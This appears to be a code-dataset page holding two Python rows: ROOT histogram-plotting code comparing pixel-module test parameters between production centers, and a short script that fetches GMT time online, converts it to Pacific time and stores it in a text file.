        for par in parameters.keys():
            FilePath = GetFilePath(par, temperature)
            stack, listdata = CreateStack(FilePath, par, temperature)
            canvas = r.TCanvas(parameters[par]['canvas'], "", 1)
            canvas.cd()
            canvas.SetLogy()
            peak = stack.GetMaximum()  # renamed: 'max' shadowed the builtin
            stack.SetMaximum(peak * 12)
            stack.SetMinimum(0.5)
            stack.Draw()
            if par == 'Noise' or par == 'PHCalibrationParameter1':
                stack.GetYaxis().SetTitle('# Pixels')
            elif par == 'Current150V' or par == 'SlopeIV':
                stack.GetYaxis().SetTitle('# Modules')
            else:
                stack.GetYaxis().SetTitle('# ROCs')
            stack.GetXaxis().SetTitle(parameters[par]['xaxistitle'])
            canvas.Update()
            # BUG FIX: the original condition was
            #     par == 'PHCalibrationParameter1' or 'Noise'
            # which is always truthy ('Noise' is a non-empty string), so the
            # *5 branch was dead code. Test membership properly.
            if par in ('PHCalibrationParameter1', 'Noise'):
                line_top = stack.GetMaximum() * 3
            else:
                line_top = stack.GetMaximum() * 5
            gradB = r.TLine(parameters[par]['gradB'], 0,
                            parameters[par]['gradB'], line_top)
            gradC = r.TLine(parameters[par]['gradC'], 0,
                            parameters[par]['gradC'], line_top)
            gradB.SetLineColor(r.kOrange)
            if par == 'Noise' or par == 'PHCalibrationParameter1':
                gradC.SetLineColor(r.kOrange)
            else:
                gradC.SetLineColor(r.kRed)
            for line in (gradB, gradC):
                line.SetLineStyle(2)
                line.SetLineWidth(3)
                line.Draw()
            latex = r.TLatex()
            latex.SetNDC()
            latex.SetTextAlign(13)
            # NOTE(review): assumes exactly two production centers (indexes
            # listdata[0] and listdata[1]) -- matches current ProdCenters.
            latex.DrawLatex(0.3, 0.87, '#color[2]{N: '+'{:.0f}'.format(listdata[0][0])+' Mean: '+'{:.3f}'.format(listdata[0][1])+' RMS: '+'{:.3f}'.format(listdata[0][2])+'}')
            latex.DrawLatex(0.3, 0.82, '#color[3]{N: '+'{:.0f}'.format(listdata[1][0])+' Mean: '+'{:.3f}'.format(listdata[1][1])+' RMS: '+'{:.3f}'.format(listdata[1][2])+'}')
            Legend = r.TLegend(0.15, 0.75, 0.25, 0.9)
            Legend.AddEntry('CER', 'CERN', 'f')
            #Legend.AddEntry('PER', 'PERUGIA', 'f')
            #Legend.AddEntry('AAC', 'AACHEN', 'f')
            Legend.AddEntry('ETH', 'ETHZ', 'f')
            Legend.SetBorderSize(0)
            Legend.SetFillStyle(0)
            Legend.Draw()
            for fmt in ['.png', '.pdf', '.root']:
                canvas.SaveAs('Results/CompareModulesRespin/' + temperature + 'ProdCentersStack' + parameters[par]['file'] + str(fmt))


main()
|
23,499 | ae4e12d4264ff0aaf41a4afaf7512283312fe5b0 | import time
import os
import requests
# Reads the value stored in dataStorage.txt, if such a value exists
def readValue():
    """Read, print and return the string stored in dataStorage.txt.

    :returns: file contents as a string
    :raises OSError: if dataStorage.txt does not exist
    """
    # 'with' guarantees the handle is closed even on error; the local was
    # also renamed from 'time', which shadowed the imported time module.
    with open("dataStorage.txt", "r") as fr:
        stored = fr.read()
    print(stored)
    return stored
# Writes a given value to dataStorage.txt - if dataStorage.txt doesn't yet exist, the file is created then written to.
def storeValue(value):
    """Write str(value) to dataStorage.txt, creating or overwriting it.

    :param value: any object; persisted via str(value)
    """
    # open(..., "w") already truncates the file; the original's flush()
    # before the write was a no-op and has been dropped. 'with' ensures
    # the handle is flushed and closed on exit.
    with open("dataStorage.txt", "w") as fo:
        fo.write(str(value))
# Fetches the current GMT time from the internet
# Format: yyyy-mm-dd HH:mm:ss
def getCurrentGMTTime():
    """Fetch the current GMT time from just-the-time.appspot.com.

    Format of the response body: yyyy-mm-dd HH:mm:ss

    :returns: response body as bytes, or None when the request fails
    """
    try:
        res = requests.get('http://just-the-time.appspot.com/')
        return res.content
    except Exception:
        # Narrowed from a bare 'except:', which also swallowed
        # KeyboardInterrupt/SystemExit; failure now returns None explicitly.
        print('Could not sync with time server.')
        print('Done.')
        return None
# Converts the fetched GMT time to PST
# Format: yyyy-mm-dd HH:mm:ss
def getCurrentPSTTime():
    """Return the current Pacific (GMT-7) time as 'YYYY-MM-DD HH:MM:SS'.

    :returns: formatted local-time string, or None when the GMT fetch failed

    NOTE(review): the fixed -7h offset is PDT, not PST proper (-8h);
    confirm whether daylight saving should be handled.
    """
    from datetime import datetime, timedelta

    gmtTime = getCurrentGMTTime()
    if gmtTime is None:
        return None
    if isinstance(gmtTime, bytes):
        gmtTime = gmtTime.decode('ascii', 'ignore')
    # BUG FIX: the original subtracted 7 from the hour field as a bare int,
    # producing negative hours (e.g. '-4:30:00') for GMT mornings and never
    # carrying into the date; it also stringified the bytes response,
    # leaving a "b'...'" artifact in the output. Parse the timestamp and
    # use timedelta arithmetic instead.
    # Assumes the service returns 'yyyy-mm-dd HH:MM:SS' -- TODO confirm.
    parsed = datetime.strptime(gmtTime.strip(), '%Y-%m-%d %H:%M:%S')
    pacific = parsed - timedelta(hours=7)
    return pacific.strftime('%Y-%m-%d %H:%M:%S')
# Get the current PST time and write it to dataStorage.txt
# Script entry: fetch the current PST time over HTTP, persist it to
# dataStorage.txt, then read it back and echo it as a sanity check.
pst = getCurrentPSTTime()
storeValue(pst)
readValue()
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.